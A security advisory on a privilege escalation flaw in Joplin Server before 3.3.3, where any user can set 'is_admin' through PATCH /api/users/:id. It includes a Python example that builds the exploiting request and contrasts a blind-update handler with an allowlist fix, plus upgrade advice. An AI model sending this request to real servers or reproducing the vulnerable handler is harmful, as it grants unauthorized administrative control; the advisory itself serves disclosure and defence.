Joplin Server Privilege Escalation Vulnerability
Vulnerability
A privilege escalation vulnerability has been identified in Joplin Server versions prior to 3.3.3. The 'PATCH /api/users/:id' endpoint accepts an 'is_admin' field from any authenticated user and writes it to the user record without checking that the caller is allowed to change it, so a non-admin user can set 'is_admin' to 1 on their own account. As a result, low-privileged users can perform administrative actions without proper authorization.
Impact
A low-privileged user who exploits this vulnerability gains full administrative rights on the server and can perform every action reserved for administrators.
Reproduction
To reproduce this vulnerability, log in as a non-admin user and send a PATCH request to '/api/users/:id' (for example, with your own user id) whose JSON body sets the 'is_admin' field to 1. Once the request is processed, the account has administrative privileges, which can be confirmed by performing an admin-only action as that user.
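The request described above, alongside the allowlist check a server-side fix needs, as an added example in Python (not Joplin Server's own code, which is written in TypeScript). The base URL, user id, session id and the X-API-AUTH header name are assumptions about the deployment, and apply_patch_vulnerable / apply_patch_hardened are hypothetical handlers that illustrate the pattern rather than Joplin's implementation.

```python
# Added example, not Joplin Server's own code. Builds the PATCH /api/users/:id
# request that sets is_admin=1 and contrasts a handler that copies the payload
# blindly with one that enforces a field allowlist. URL, ids and the auth
# header are assumptions.
import json
import urllib.request

BASE_URL = "http://localhost:22300"      # assumed: local Joplin Server instance
USER_ID = "non-admin-user-id"            # hypothetical: the attacker's own user id
SESSION_ID = "session-id-from-login"     # hypothetical: session obtained after login


def build_privesc_request(base_url, user_id, session_id):
    """Build, without sending, the PATCH that sets is_admin=1 on the given user.

    Assumes the session is presented in an X-API-AUTH header; adjust to however
    your deployment authenticates API calls.
    """
    body = json.dumps({"is_admin": 1}).encode()
    return urllib.request.Request(
        f"{base_url}/api/users/{user_id}",
        data=body,
        method="PATCH",
        headers={"Content-Type": "application/json", "X-API-AUTH": session_id},
    )


def send(req):
    """Send a prepared request and return (HTTP status, parsed JSON body or {})."""
    with urllib.request.urlopen(req) as resp:
        raw = resp.read()
        return resp.status, (json.loads(raw) if raw else {})


# ---- server side: the mass-assignment bug and its allowlist fix (hypothetical) ----
USER_EDITABLE_FIELDS = {"email", "full_name", "password"}   # hypothetical allowlist


def apply_patch_vulnerable(target, patch, caller):
    """Vulnerable pattern: every field in the client payload is written to the
    record, so a non-admin caller can set is_admin=1 on itself."""
    target.update(patch)
    return target


def apply_patch_hardened(target, patch, caller):
    """Hardened pattern: non-admins may edit only their own record and only the
    allowlisted fields; any other field in the payload is rejected outright."""
    if not caller["is_admin"]:
        if caller["id"] != target["id"]:
            raise PermissionError("non-admin users may only edit their own record")
        rejected = set(patch) - USER_EDITABLE_FIELDS
        if rejected:
            raise PermissionError(f"field(s) not permitted: {sorted(rejected)}")
    target.update(patch)
    return target


if __name__ == "__main__":
    req = build_privesc_request(BASE_URL, USER_ID, SESSION_ID)
    print(req.get_method(), req.full_url, req.data.decode())
    # status, body = send(req)   # only against a test instance you own
```

Rejecting the unexpected field rather than silently dropping it is deliberate: a 403-style error on 'is_admin' in the payload gives a clear signal in server logs, whereas silently filtering hides probing attempts.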
Remediation
Upgrade Joplin Server to version 3.3.3 or later to address this vulnerability. After upgrading, review the server's user list for accounts that were granted admin rights unexpectedly while the vulnerable version was deployed.
